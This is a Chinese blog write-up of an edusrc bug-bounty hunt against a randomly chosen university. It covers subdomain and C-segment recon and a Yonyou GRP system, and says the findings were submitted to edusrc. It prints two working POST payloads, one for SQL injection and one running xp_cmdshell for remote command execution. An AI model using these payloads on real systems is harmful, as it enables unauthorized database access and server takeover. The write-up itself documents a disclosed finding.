记如何简单的挖掘edusrc
FW 渗透测试 7123浏览 · 2021-10-08 06:10

闲来没事,突然想到能不能挖一手edu的漏洞,打开edusrc高校排行榜随机抽取了一位幸运儿,然后开始对此开始测试

1

第一步肯定是信息收集,比较懒直接就收集子域名,什么whoami,资产,CDN管都不管,开启oneforall就是开干


兴高采烈地的打开扫完的文档
怎么就这几个站点 这下难住了

一个一个网站测试过去 都没有很好的结果都是一些危害较低的
仔细想想 又回来信息收集 收集一手c段

完美成功的拿下了c段
现在就是测试有没有c段的网站了
利用fofa语法搜索
ip="X.X.X.0/24" && status_code="200"


一个一个的网段测试下来终于找到一个脆弱的站点了
打开一看 是用友的GRP


百度搜索一下有没有可以利用的漏洞 发现还是有很多的漏洞的

开始检测漏洞
经过验证发现存在SQL注入和RCE 美滋滋又是一个高危
通过backbar POST方式提交
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><r9packet version="1"><dataformat>XML</dataformat><r9function><name>AS_DataRequest</name><params><param><name>ProviderName</name><data format="text">DataSetProviderData</data><param><name>Data</name><data format="text">select db_name() </data></params></r9function></r9packet>
然后burp抓包 发送到重放器中


nice 成功爆出数据库的名字 不过只是中危
接下来尝试能不能RCE
同样 通过backbar POST方式提交
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><r9packet version="1"><dataformat>XML</dataformat><r9function><name>AS_DataRequest</name><params><param><name>ProviderName</name><data format="text">DataSetProviderData</data><param><name>Data</name><data format="text">exec xp_cmdshell 'whoami'</data></params></r9function></r9packet>
然后burp抓包 发送到重放器中


成功执行 拿下一个高危

结尾

漏洞当前已经上交edusrc,挖掘的没什么特别难的地方,漏洞也都是复现网上的,最主要的是信息收集,收集的地址越多,能够拿下高危的机会也就越大(大佬除外),总的来说就是信息收集找寻脆弱站点,然后利用网上公布相同系统的漏洞进行利用。

9 条评论
某人
表情
可输入 255
山西哥谭小丑
2021-10-09 08:44 0 回复

@倩倩大魔王 你加群就有了884338047大群都有


FW
2021-10-09 03:17 0 回复

@倩倩大魔王 挖一个edu站点换邀请码或者找人拿邀请码


FW
2021-10-09 03:16 0 回复

@ThestaRY whoami可以查询学校注册的网段


FW
2021-10-09 03:16 0 回复

@Pyth0n 这个别人团队的网站 whoami可以查询学校注册的网段


倩倩大魔王
2021-10-09 01:50 0 回复

@满腔热血付于海 怎么申请啊


ThestaRY
2021-10-08 14:55 0 回复


同问大佬,这是什么工具啊


Pyth0n
2021-10-08 14:05 0 回复



大佬 这个是什么工具看的


FW
2021-10-08 11:21 0 回复

@倩倩大魔王 https://src.sjtu.edu.cn/rank/firm/ 要有教育src的账号才能看


倩倩大魔王
2021-10-08 09:23 0 回复

大佬 高校排行榜在哪里看


目录